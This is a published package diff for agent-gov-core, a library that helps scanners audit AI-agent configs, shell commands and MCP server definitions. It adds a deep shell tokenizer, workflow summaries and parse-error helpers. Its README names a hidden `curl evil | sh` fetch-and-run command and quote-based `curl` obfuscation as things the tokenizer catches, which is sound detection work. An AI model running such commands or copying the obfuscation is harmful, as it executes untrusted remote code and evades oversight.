agent-gov-core 0.4.2 → 0.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
Binary file
package/README.md CHANGED
@@ -66,14 +66,16 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
66
66
  - `isSeverity(v)`, `isToolKind(v)`, `isNamespacedKind(v)` — type guards
67
67
  - `kind(tool, name)` — build a namespaced kind without hand-assembling the dotted string
68
68
  - `createFinding({tool, name, severity, message, ...})` — convenience constructor that calls `kind()` and `fingerprintFinding()` for you
69
- - `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe
69
+ - `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column, salientKey?)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe. Pass `salientKey` (since v0.4.3) when multiple distinct findings can fire at the same site
70
70
  - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`
71
71
 
72
72
  ### Config readers
73
- - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`; `value` and `json` reference the same parsed object `json` is kept as a deprecated alias.
73
+ - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
74
74
  - `stripJsonComments(text)` — same logic exposed for in-memory text
75
- - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`; `value` and `toml` reference the same parsed object — `toml` is kept as a deprecated alias.
76
- - `parseToml(text)` — same exposed for text
75
+ - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`. Errors are also `ConfigParseError` with `line`/`column`/`rawOffset` when resolvable.
76
+ - `parseToml(text)` — same exposed for text; throws raw `Error` (file-level wrapping happens in `readTomlObject`)
77
+ - `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. Lets downstream tools emit a `*.config_syntax_error` finding pointing at the exact spot.
78
+ - `lineColumnOfOffset(text, offset)` — convert a 0-based offset into `text` (a string index; for non-ASCII text this is not the same as a UTF-8 byte count) to 1-based `{ line, column }`. Useful when a hand-rolled scanner exposes character positions and a `Finding.location` needs line/column.
77
79
 
78
80
  ### Line locators
79
81
  - `lineOfJsonKey(text, key, scope?)` — 1-based line of `"key":`, optionally scoped to a byte range
@@ -85,12 +87,14 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
85
87
 
86
88
  ### Shell tokenization
87
89
  - `tokenizeShell(command)` — quote-aware split on `;`, `|`, `&&`, `||` plus trivial obfuscation neutralization (`c""url` → `curl`, `c\\url` → `curl`)
90
+ - `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal, per shell semantics).
88
91
  - `getCommandHead(subcommand)` — extract the leading verb after tokenization
89
92
 
90
93
  ### GitHub Action helpers
91
94
  - `rankSeverity(s)` — numeric rank `low=1, medium=2, high=3, critical=4` (matches the schema's closed severity enum; there is no `none`)
92
95
  - `passesSeverityThreshold(s, threshold)`, `anyAtOrAbove(findings, threshold)` — fail-on plumbing
93
96
  - `emitFindingAnnotation(f)` — render a Finding as a `::warning file=…,line=…,title=…::…` GitHub workflow annotation
97
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary suitable for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks so findings stay visible even when GHA's inline-annotation cap (~10 per level, 50 per run) silently drops the rest. Each severity group lists up to `perSeverityLimit` rows (default 100) and reports the remainder as a `(+N more)` row
94
98
 
95
99
  ### Test fixtures (`agent-gov-core/test-utils`)
96
100
  Secondary entry point used by consumer test suites. Zero overhead in production — only loaded when test files import it.
package/dist/action.d.ts CHANGED
@@ -28,4 +28,34 @@ export declare function anyAtOrAbove(findings: readonly Finding[], threshold: Se
28
28
  * // → '::error file=.github/workflows/ci.yml,line=12,title=[capability_echo.workflow_permission_write] high::Workflow grants contents: write to PR-triggered jobs.'
29
29
  */
30
30
  export declare function emitFindingAnnotation(finding: Finding): string;
31
+ export interface WorkflowSummaryOptions {
32
+ /** Top-level heading. Default: `Findings`. */
33
+ title?: string;
34
+ /** Cap per severity group; remaining count rendered as `(+N more)`. Default: 100. */
35
+ perSeverityLimit?: number;
36
+ /** Truncate message to this many characters (with `…` suffix). Default: 200. */
37
+ messageMaxLength?: number;
38
+ }
39
+ /**
40
+ * Render a Markdown summary of findings suitable for writing to
41
+ * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
42
+ * level, 50 per run) and silently drops the rest; the step summary has no
43
+ * such cap, so a Markdown table keeps findings visible in the workflow's run
44
+ * summary page (up to `perSeverityLimit` rows per severity) even when annotations are truncated.
45
+ *
46
+ * Findings are grouped by severity (critical → high → medium → low) inside
47
+ * collapsible `<details>` blocks. Each row carries file, line, kind, and a
48
+ * length-capped message. Pipe characters in message text are escaped so they
49
+ * don't break Markdown table rendering.
50
+ *
51
+ * @example
52
+ * import { generateWorkflowSummary } from 'agent-gov-core';
53
+ * import { appendFileSync } from 'node:fs';
54
+ *
55
+ * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
56
+ * if (process.env.GITHUB_STEP_SUMMARY) {
57
+ * appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
58
+ * }
59
+ */
60
+ export declare function generateWorkflowSummary(findings: readonly Finding[], options?: WorkflowSummaryOptions): string;
31
61
  //# sourceMappingURL=action.d.ts.map
package/dist/action.js CHANGED
@@ -76,4 +76,102 @@ function escapeProperty(s) {
76
76
  .replace(/:/g, '%3A')
77
77
  .replace(/,/g, '%2C');
78
78
  }
79
/**
 * Render a Markdown summary of findings suitable for writing to
 * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
 * level, 50 per run) and silently drops the rest; the step summary is not
 * subject to that cap, so a Markdown table keeps findings visible in the
 * workflow's run summary page even when annotations are truncated.
 *
 * Findings are grouped by severity (critical → high → medium → low) inside
 * collapsible `<details>` blocks; the critical and high groups are rendered
 * open. Each row carries file, line, kind, and a length-capped message. Every
 * cell is passed through `escapeMarkdownTableCell` so cell content cannot
 * break the table or the surrounding `<details>` markup.
 *
 * Findings whose `severity` is not one of the four known values are listed in
 * a trailing `unknown` group instead of aborting the whole summary.
 *
 * @param findings Findings to render. An empty list yields a short
 *   "No findings." document.
 * @param options Optional rendering knobs:
 *   - `title`: top-level heading (default `Findings`).
 *   - `perSeverityLimit`: maximum rows per severity group (default 100);
 *     negative values are treated as 0. The remainder is reported as a
 *     `(+N more …)` row.
 *   - `messageMaxLength`: message length cap passed to `truncate`
 *     (default 200).
 * @returns The Markdown document as a single string.
 *
 * @example
 * import { generateWorkflowSummary } from 'agent-gov-core';
 * import { appendFileSync } from 'node:fs';
 *
 * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
 * if (process.env.GITHUB_STEP_SUMMARY) {
 *   appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
 * }
 */
export function generateWorkflowSummary(findings, options = {}) {
    const title = options.title ?? 'Findings';
    // A negative limit would make `slice(0, limit)` drop rows from the END of
    // the group, which is never what a "cap" means — clamp it to zero.
    const perGroupLimit = Math.max(0, options.perSeverityLimit ?? 100);
    const messageMax = options.messageMaxLength ?? 200;
    if (findings.length === 0) {
        return `# ${title}\n\nNo findings.\n`;
    }
    const severityOrder = ['critical', 'high', 'medium', 'low'];
    // A Map (not a plain object) so a hostile severity such as `constructor`
    // or `__proto__` can never resolve to an inherited property.
    const groups = new Map();
    for (const severity of severityOrder)
        groups.set(severity, []);
    const unknown = [];
    for (const f of findings) {
        const bucket = groups.get(f.severity) ?? unknown;
        bucket.push(f);
    }
    const countParts = severityOrder.map((severity) => `${groups.get(severity).length} ${severity}`);
    if (unknown.length > 0)
        countParts.push(`${unknown.length} unknown`);
    const lines = [];
    lines.push(`# ${title}`, '');
    lines.push(`**Total**: ${findings.length} finding${findings.length === 1 ? '' : 's'} — ` +
        countParts.join(', '));
    lines.push('');
    const sections = severityOrder.map((severity) => [severity, groups.get(severity)]);
    sections.push(['unknown', unknown]);
    for (const [severity, group] of sections) {
        if (group.length === 0)
            continue;
        const shown = group.slice(0, perGroupLimit);
        const overflow = group.length - shown.length;
        // Only the two most urgent groups start expanded.
        const openAttr = severity === 'critical' || severity === 'high' ? ' open' : '';
        lines.push(`<details${openAttr}>`);
        lines.push(`<summary><strong>${group.length} ${severity}</strong></summary>`);
        lines.push('');
        lines.push('| File | Line | Kind | Message |');
        lines.push('|------|------|------|---------|');
        for (const f of shown) {
            const cells = [
                escapeMarkdownTableCell(f.location?.file ?? '—'),
                // Escaped like every other cell in case an unvalidated finding
                // carries a non-numeric `line`.
                escapeMarkdownTableCell(f.location?.line ?? '—'),
                escapeMarkdownTableCell(f.kind),
                escapeMarkdownTableCell(truncate(f.message, messageMax)),
            ];
            lines.push('| ' + cells.join(' | ') + ' |');
        }
        if (overflow > 0) {
            lines.push(`| _(+${overflow} more ${severity} finding${overflow === 1 ? '' : 's'})_ | | | |`);
        }
        lines.push('');
        lines.push('</details>');
        lines.push('');
    }
    return lines.join('\n');
}
158
/**
 * Shorten `s` so the result is never longer than `max` UTF-16 code units.
 *
 * Strings that already fit are returned unchanged. Otherwise the string is
 * cut and a single `…` is appended, with the ellipsis counted against `max`.
 * A `max` that is zero, negative, or NaN yields an empty string, because
 * there is no room even for the ellipsis.
 *
 * @param s Text to shorten.
 * @param max Maximum length of the returned string.
 * @returns `s` itself, or a shortened copy ending in `…`.
 */
function truncate(s, max) {
    if (s.length <= max)
        return s;
    const budget = Math.floor(max);
    if (!(budget > 0))
        return '';
    // Reserve one slot for the ellipsis.
    let end = budget - 1;
    // Never cut between the two halves of a surrogate pair: a dangling high
    // surrogate renders as a replacement character.
    if (end > 0) {
        const last = s.charCodeAt(end - 1);
        if (last >= 0xd800 && last <= 0xdbff)
            end--;
    }
    return s.slice(0, end) + '…';
}
163
/**
 * Make an arbitrary value safe to place inside one cell of a Markdown table
 * that itself sits inside a `<details>` block.
 *
 * - `&`, `<`, `>` become HTML entities so text such as `</summary>` or `<h1>`
 *   cannot break out of the surrounding `<details>` block. GitHub sanitizes
 *   script execution, but unescaped tags would still let a finding manipulate
 *   the visual layout of the summary (collapse other groups, inject
 *   misleading headings, etc.).
 * - `|` is backslash-escaped so it is not read as a cell delimiter. Any run
 *   of backslashes directly in front of the pipe is doubled first; otherwise
 *   an input like `\|` would become `\\|`, which a GFM parser can read as an
 *   escaped backslash followed by a real delimiter.
 * - Every line ending (`\r\n`, lone `\r`, lone `\n`) becomes a single space,
 *   since a table row must stay on one line.
 *
 * @param s Value to render; coerced with `String()`.
 * @returns The escaped single-line cell text.
 */
function escapeMarkdownTableCell(s) {
    return String(s)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/(\\*)\|/g, '$1$1\\|')
        .replace(/\r\n|\r|\n/g, ' ');
}
79
177
  //# sourceMappingURL=action.js.map
package/dist/finding.d.ts CHANGED
@@ -26,6 +26,16 @@ export interface Finding {
26
26
  location?: FindingLocation;
27
27
  /** Stable identifier for dedupe across runs. Recommended: hash of (kind, location, salient fields). */
28
28
  fingerprint?: string;
29
+ /**
30
+ * Optional discriminator that participates in the fingerprint hash. Set this
31
+ * when a single (kind, file, line) site can legitimately host multiple distinct
32
+ * findings — e.g. two suspicious imports on the same line, two MCP servers in
33
+ * the same JSON object, two npm dependencies declared in one package.json line.
34
+ * Without it, the meta-reviewer would dedupe them into one. Use a stable value
35
+ * that doesn't drift across reruns (package name, server name, rule id) — not
36
+ * a timestamp or counter.
37
+ */
38
+ salientKey?: string;
29
39
  /** Optional structured metadata; downstream meta-reviewers may inspect it. */
30
40
  data?: Record<string, unknown>;
31
41
  }
@@ -57,6 +67,12 @@ export interface CreateFindingSpec {
57
67
  detail?: string;
58
68
  location?: FindingLocation;
59
69
  data?: Record<string, unknown>;
70
+ /**
71
+ * See {@link Finding.salientKey}. Pass when the same (kind, file, line) site
72
+ * can produce multiple distinct findings that must not collapse to one
73
+ * fingerprint.
74
+ */
75
+ salientKey?: string;
60
76
  /** Optional explicit fingerprint. If omitted, {@link fingerprintFinding} is computed. */
61
77
  fingerprint?: string;
62
78
  }
package/dist/finding.js CHANGED
@@ -62,6 +62,8 @@ export function createFinding(spec) {
62
62
  finding.detail = spec.detail;
63
63
  if (spec.location !== undefined)
64
64
  finding.location = spec.location;
65
+ if (spec.salientKey !== undefined)
66
+ finding.salientKey = spec.salientKey;
65
67
  if (spec.data !== undefined)
66
68
  finding.data = spec.data;
67
69
  finding.fingerprint = spec.fingerprint ?? fingerprintFinding(finding);
@@ -99,6 +101,13 @@ export function fingerprintFinding(finding) {
99
101
  finding.location?.line ?? '',
100
102
  finding.location?.column ?? '',
101
103
  ];
104
+ // salientKey is appended ONLY when present. Appending `?? ''` would add a
105
+ // trailing pipe even for findings without salientKey, breaking the v0.4.2
106
+ // hash. This way pre-0.4.3 fingerprints stay stable for findings that
107
+ // never set salientKey, while new findings with one stay distinct.
108
+ if (finding.salientKey !== undefined) {
109
+ parts.push(finding.salientKey);
110
+ }
102
111
  return createHash('sha256').update(parts.join('|')).digest('hex').slice(0, 16);
103
112
  }
104
113
  const FINDING_ALLOWED_KEYS = new Set([
@@ -109,6 +118,7 @@ const FINDING_ALLOWED_KEYS = new Set([
109
118
  'detail',
110
119
  'location',
111
120
  'fingerprint',
121
+ 'salientKey',
112
122
  'data',
113
123
  ]);
114
124
  const LOCATION_ALLOWED_KEYS = new Set(['file', 'line', 'column', 'endLine', 'endColumn']);
@@ -145,6 +155,9 @@ export function validateFinding(value) {
145
155
  if (v.fingerprint !== undefined && typeof v.fingerprint !== 'string') {
146
156
  errors.push('fingerprint must be a string when present');
147
157
  }
158
+ if (v.salientKey !== undefined && typeof v.salientKey !== 'string') {
159
+ errors.push('salientKey must be a string when present');
160
+ }
148
161
  if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
149
162
  errors.push('data must be an object when present');
150
163
  }
package/dist/index.d.ts CHANGED
@@ -4,10 +4,12 @@ export type { JsonObjectWithSource } from './jsonc.js';
4
4
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
5
5
  export type { TomlObjectWithSource } from './toml.js';
6
6
  export { readTomlObject, parseToml } from './toml.js';
7
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
7
8
  export type { ByteRange } from './locators.js';
8
9
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
9
10
  export type { McpCommandSpec } from './mcp.js';
10
11
  export { normalizeMcpCommand } from './mcp.js';
11
- export { tokenizeShell, getCommandHead } from './shell.js';
12
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
12
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
13
+ export type { WorkflowSummaryOptions } from './action.js';
14
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
13
15
  //# sourceMappingURL=index.d.ts.map
package/dist/index.js CHANGED
@@ -1,8 +1,9 @@
1
1
  export { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, isNamespacedKind, kind, createFinding, fingerprintFinding, validateFinding, } from './finding.js';
2
2
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
3
3
  export { readTomlObject, parseToml } from './toml.js';
4
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
4
5
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
5
6
  export { normalizeMcpCommand } from './mcp.js';
6
- export { tokenizeShell, getCommandHead } from './shell.js';
7
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
7
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
8
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
8
9
  //# sourceMappingURL=index.js.map
package/dist/jsonc.js CHANGED
@@ -1,4 +1,5 @@
1
1
  import { readFileSync } from 'node:fs';
2
+ import { toConfigParseError } from './parse-error.js';
2
3
  /**
3
4
  * Strip `//` line comments, `/* ... *\/` block comments, and trailing commas from JSONC,
4
5
  * preserving byte offsets (replacement is space-filled, newlines preserved) so downstream
@@ -113,7 +114,7 @@ export function readJsonObjectWithSource(path) {
113
114
  return { value: parsed, json: parsed, text };
114
115
  }
115
116
  catch (err) {
116
- return { value: undefined, json: undefined, text, parseError: err };
117
+ return { value: undefined, json: undefined, text, parseError: toConfigParseError(text, err) };
117
118
  }
118
119
  }
119
120
  //# sourceMappingURL=jsonc.js.map
@@ -28,7 +28,9 @@ export declare function lineOfJsonKey(text: string, key: string, scope?: ByteRan
28
28
  * The value is JSON-encoded before matching so values containing backslashes
29
29
  * (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
30
30
  * located correctly. The scan ignores JSONC comments so a commented-out
31
- * matching value does not shadow the real one.
31
+ * matching value does not shadow the real one. The negative lookahead skips
32
+ * occurrences in key position (`"command":`) so a value matching a key name
33
+ * elsewhere in the document doesn't return the key's line.
32
34
  */
33
35
  export declare function lineOfJsonStringValue(text: string, value: string, scope?: ByteRange): number;
34
36
  /**
package/dist/locators.js CHANGED
@@ -26,11 +26,13 @@ export function lineOfJsonKey(text, key, scope) {
26
26
  * The value is JSON-encoded before matching so values containing backslashes
27
27
  * (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
28
28
  * located correctly. The scan ignores JSONC comments so a commented-out
29
- * matching value does not shadow the real one.
29
+ * matching value does not shadow the real one. The negative lookahead skips
30
+ * occurrences in key position (`"command":`) so a value matching a key name
31
+ * elsewhere in the document doesn't return the key's line.
30
32
  */
31
33
  export function lineOfJsonStringValue(text, value, scope) {
32
34
  const encoded = jsonEncodeForRegex(value);
33
- return findLineByRegex(text, new RegExp(`"${encoded}"`), scope);
35
+ return findLineByRegex(text, new RegExp(`"${encoded}"(?!\\s*:)`), scope);
34
36
  }
35
37
  /**
36
38
  * Convert a string to the form it would appear in JSON source bytes, then
@@ -56,43 +58,120 @@ export function lineOfTomlKey(text, dottedKey, scope) {
56
58
  const parts = splitTomlDottedKey(dottedKey);
57
59
  if (parts.length === 0)
58
60
  return 0;
59
- const leaf = parts[parts.length - 1];
60
- const prefix = parts.slice(0, -1);
61
61
  const lines = text.split(/\r?\n/);
62
62
  const inScope = scopeLineFilter(text, scope);
63
- // Find header range we're inside of.
64
- let inTargetTable = prefix.length === 0;
65
63
  let currentTable = [];
66
- const targetHeader = prefix.join('.');
64
+ // Track multi-line basic (`"""`) and literal (`'''`) string state. A leaf-key
65
+ // pattern can otherwise match against decoy text inside a multi-line string
66
+ // value — see lineOfTomlKey regression tests.
67
+ let inMultilineString = null;
67
68
  for (let i = 0; i < lines.length; i++) {
68
69
  const lineNumber = i + 1;
69
70
  const raw = lines[i];
71
+ const stateAtLineStart = inMultilineString;
72
+ inMultilineString = updateMultilineStringState(raw, inMultilineString);
73
+ // If we entered this line inside a multi-line string, never match. The key
74
+ // pattern there is part of a string literal, not a real assignment.
75
+ if (stateAtLineStart !== null)
76
+ continue;
70
77
  const trimmed = raw.trim();
71
78
  const headerMatch = /^\[\[?\s*([^\]]+?)\s*\]\]?\s*(#.*)?$/.exec(trimmed);
72
79
  if (headerMatch) {
73
80
  currentTable = splitTomlDottedKey(headerMatch[1]);
74
- inTargetTable = currentTable.join('.') === targetHeader;
75
81
  continue;
76
82
  }
77
- if (!inTargetTable)
78
- continue;
79
83
  if (trimmed === '' || trimmed.startsWith('#'))
80
84
  continue;
81
85
  if (!inScope(lineNumber))
82
86
  continue;
83
- // Match leaf key at start of line: bare, "quoted", or 'literal'
84
- const leafPattern = new RegExp(`^\\s*(?:${escapeForRegex(leaf)}|"${escapeForRegex(leaf)}"|'${escapeForRegex(leaf)}')\\s*(?:\\.|=)`);
85
- if (leafPattern.test(raw))
87
+ // Generalized dotted-key matching: if the current table is a strict
88
+ // prefix of (or equal to) the target dotted key, try matching the
89
+ // REMAINING dotted segments on this line. Covers all three cases:
90
+ // - Top-level (`a.b.c = 1` at root): currentTable=[] → match `a.b.c`
91
+ // - Inside a parent (`[a]\nb.c = 1`): currentTable=['a'] → match `b.c`
92
+ // - Inside the exact table (`[a.b]\nc = 1`): currentTable=['a','b'] → match `c`
93
+ const tableIsPrefix = currentTable.length <= parts.length &&
94
+ currentTable.every((seg, idx) => seg === parts[idx]);
95
+ if (!tableIsPrefix)
96
+ continue;
97
+ const remaining = parts.slice(currentTable.length);
98
+ if (remaining.length === 0)
99
+ continue;
100
+ // Remaining-as-dotted-key match (covers any depth ≥ 1). Build the
101
+ // regex from individual segments joined by `\s*\.\s*` so spaced dotted
102
+ // keys (`a . b . c = 1` — valid TOML) match as well as compact ones.
103
+ const segmentsPattern = remaining.map(escapeForRegex).join('\\s*\\.\\s*');
104
+ const dottedPattern = new RegExp(`^\\s*${segmentsPattern}\\s*=`);
105
+ if (dottedPattern.test(raw))
86
106
  return lineNumber;
87
- // Also: dotted key like `prefix.leaf = ...` defined at top-level
88
- if (prefix.length > 0 && currentTable.length === 0) {
89
- const dottedPattern = new RegExp(`^\\s*${escapeForRegex(dottedKey)}\\s*=`);
90
- if (dottedPattern.test(raw))
107
+ // If remaining is exactly the leaf, also try the quoted-leaf forms
108
+ if (remaining.length === 1) {
109
+ const leafKey = remaining[0];
110
+ const leafPattern = new RegExp(`^\\s*(?:${escapeForRegex(leafKey)}|"${escapeForRegex(leafKey)}"|'${escapeForRegex(leafKey)}')\\s*(?:\\.|=)`);
111
+ if (leafPattern.test(raw))
91
112
  return lineNumber;
92
113
  }
93
114
  }
94
115
  return 0;
95
116
  }
117
/**
 * Walk one line of TOML text and return the multi-line string state that
 * holds at the END of that line.
 *
 * Inside a basic multi-line string (`"""…"""`), a backslash escapes the next
 * character — so `\"""` is literal text inside the value, NOT the closing
 * delimiter. The walker skips the character after each `\`, otherwise it
 * would leave the string early and let key patterns match text that is still
 * part of the value.
 *
 * Literal multi-line strings (`'''…'''`) do not process escapes per the TOML
 * spec, so backslash is inert there.
 *
 * Outside any multi-line string the walker also steps over `#` comments and
 * single-line strings, so a `"""` or `'''` that appears inside a comment or
 * inside an ordinary quoted value is not mistaken for an opening delimiter.
 *
 * @param line One line of text, without its line terminator.
 * @param current State at the start of the line: `'"""'`, `"'''"`, or `null`
 *   when not inside a multi-line string.
 * @returns The state at the end of the line, using the same three values.
 */
function updateMultilineStringState(line, current) {
    let state = current;
    let pos = 0;
    while (pos < line.length) {
        if (state === '"""') {
            // Inside a basic multi-line string — honor backslash escapes.
            if (line[pos] === '\\') {
                pos += 2; // skip the backslash AND the character it escapes
                continue;
            }
            if (line.startsWith('"""', pos)) {
                state = null;
                pos += 3;
                continue;
            }
            pos++;
            continue;
        }
        if (state === "'''") {
            // Literal multi-line string — no escapes per spec.
            if (line.startsWith("'''", pos)) {
                state = null;
                pos += 3;
                continue;
            }
            pos++;
            continue;
        }
        // Not inside a multi-line string.
        const ch = line[pos];
        if (ch === '#') {
            // The rest of the line is a comment; quotes in it mean nothing.
            break;
        }
        if (ch === '"' || ch === "'") {
            const triple = ch.repeat(3);
            if (line.startsWith(triple, pos)) {
                state = triple;
                pos += 3;
                continue;
            }
            // Single-line string: step over it so quote characters or `#`
            // inside the value are not interpreted. An unterminated string
            // simply runs to the end of the line.
            pos++;
            while (pos < line.length && line[pos] !== ch) {
                // Only basic (double-quoted) strings process escapes.
                if (ch === '"' && line[pos] === '\\')
                    pos++;
                pos++;
            }
            pos++; // step past the closing quote
            continue;
        }
        pos++;
    }
    return state;
}
96
175
  function scopeLineFilter(text, scope) {
97
176
  if (!scope)
98
177
  return () => true;
package/dist/mcp.js CHANGED
@@ -41,13 +41,47 @@ export function normalizeMcpCommand(spec) {
41
41
  }
42
42
  return parts.join('\n');
43
43
  }
44
- /** Strip `.cmd`/`.exe`/`.bat`/`.ps1` suffix and lowercase on Windows-style paths. */
44
+ /**
45
+ * Strip `.cmd`/`.exe`/`.bat`/`.ps1` suffix on Windows-style paths and
46
+ * lowercase those — Windows filesystem lookup is case-insensitive, so
47
+ * `NPX.CMD`, `npx.cmd`, and `npx` all refer to the same executable and
48
+ * should produce identical identity strings. POSIX paths (no backslash
49
+ * separator, no Windows suffix) keep their case because `./curl` and
50
+ * `./CURL` are genuinely different files there.
51
+ */
45
52
  function normalizeExecutable(cmd) {
46
53
  const trimmed = cmd.trim();
47
54
  const base = trimmed.replace(/\\/g, '/');
55
+ const hadWindowsSuffix = /\.(cmd|exe|bat|ps1)$/i.test(base);
48
56
  const withoutSuffix = base.replace(/\.(cmd|exe|bat|ps1)$/i, '');
49
- return withoutSuffix;
57
+ // Windows-shaped if the original used `\` separators or had a Windows
58
+ // executable suffix. In either case, case-fold for cross-machine identity.
59
+ const isWindowsShaped = hadWindowsSuffix || trimmed.includes('\\');
60
+ const cased = isWindowsShaped ? withoutSuffix.toLowerCase() : withoutSuffix;
61
+ // De-noise PATH-resolved runtimes: `/usr/bin/node` and `node` both run node.
62
+ // Only fold when the basename matches a known runtime so custom scripts at
63
+ // absolute paths (e.g. `/opt/internal/orchestrator.sh`) keep their identity.
64
+ const basename = cased.split('/').pop() ?? cased;
65
+ if (KNOWN_RUNTIMES.has(basename.toLowerCase())) {
66
+ return isWindowsShaped ? basename.toLowerCase() : basename;
67
+ }
68
+ return cased;
50
69
  }
70
+ /**
71
+ * Common runtime executables whose absolute-path location varies across
72
+ * machines (PATH lookup resolves them) but whose identity for MCP-config
73
+ * purposes is the runtime name itself. Conservative — only entries where
74
+ * basename collapse is provably safe across the platforms an MCP config
75
+ * might be authored on.
76
+ */
77
+ const KNOWN_RUNTIMES = new Set([
78
+ 'node', 'npx', 'npm', 'pnpm', 'yarn',
79
+ 'python', 'python3', 'pip', 'pip3', 'pipx', 'uvx', 'uv',
80
+ 'ruby', 'gem', 'bundle',
81
+ 'perl', 'cpan',
82
+ 'bash', 'sh', 'zsh', 'fish', 'powershell', 'pwsh',
83
+ 'deno', 'bun', 'tsx', 'ts-node',
84
+ ]);
51
85
  function normalizePath(p) {
52
86
  return p.trim().replace(/\\/g, '/').replace(/\/+$/, '');
53
87
  }
@@ -59,6 +93,22 @@ function normalizePath(p) {
59
93
  * (npx, uvx, pipx, node).
60
94
  */
61
95
  const NEUTRAL_BOOLEAN_FLAGS = new Set(['-y', '--yes']);
96
+ /**
97
+ * Flags universally treated as boolean (no value follows) by the runners we
98
+ * care about. Listed so `canonicalizeArgs` doesn't greedily pair them with the
99
+ * next positional argument, which would conflate `--verbose pkg` with
100
+ * `--verbose=pkg`. Unlike NEUTRAL_BOOLEAN_FLAGS these stay in the canonical
101
+ * form — they're load-bearing (different identity vs. their absence) but
102
+ * standalone.
103
+ *
104
+ * Conservative — only flags where "takes a value" is essentially never their
105
+ * meaning in any CLI we'd see in an MCP config.
106
+ */
107
+ const KNOWN_BOOLEAN_FLAGS = new Set([
108
+ '-v', '-V', '-q', '-h', '-d',
109
+ '--verbose', '--quiet', '--silent', '--debug', '--help', '--version',
110
+ '--force', '--dry-run', '--no-cache', '--no-color', '--no-progress', '--json',
111
+ ]);
62
112
  /**
63
113
  * Sort *neutral* flag/value pairs so reordering doesn't change identity, but
64
114
  * preserve the order of positional arguments (which are usually load-bearing —
@@ -87,6 +137,15 @@ function canonicalizeArgs(args) {
87
137
  flagPairs.push([a.slice(0, eq), a.slice(eq + 1)]);
88
138
  continue;
89
139
  }
140
+ // Known-boolean flags never consume the next argument, so `--verbose pkg`
141
+ // leaves `pkg` as a positional rather than collapsing into a fake pair.
142
+ // Without this guard, reordering ['--host', 'localhost', '--verbose', 'pkg']
143
+ // vs ['--verbose', '--host', 'localhost', 'pkg'] produced different
144
+ // canonical strings because `--verbose` greedily ate the next non-flag.
145
+ if (KNOWN_BOOLEAN_FLAGS.has(a)) {
146
+ flagPairs.push([a, null]);
147
+ continue;
148
+ }
90
149
  const next = filtered[i + 1];
91
150
  if (next !== undefined && !next.startsWith('-')) {
92
151
  flagPairs.push([a, next]);
@@ -0,0 +1,54 @@
1
+ /**
2
+ * Structured config-file parse error. Carries the 1-based line and column of
3
+ * the failure so consumers can emit a `*.config_syntax_error` Finding pointing
4
+ * at the exact spot without recomputing line numbers from the raw offset.
5
+ *
6
+ * Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
7
+ * {@link readTomlObject} populate the `parseError` field of their result with
8
+ * this type whenever they can resolve a byte offset from the underlying parser.
9
+ * When the underlying error lacks position info, the original `Error` is
10
+ * preserved unchanged.
11
+ *
12
+ * @example
13
+ * import { readTomlObject, ConfigParseError } from 'agent-gov-core';
14
+ * const { parseError } = readTomlObject('.codex/config.toml');
15
+ * if (parseError instanceof ConfigParseError) {
16
+ * emitFinding({
17
+ * kind: 'policy_mesh.config_syntax_error',
18
+ * location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
19
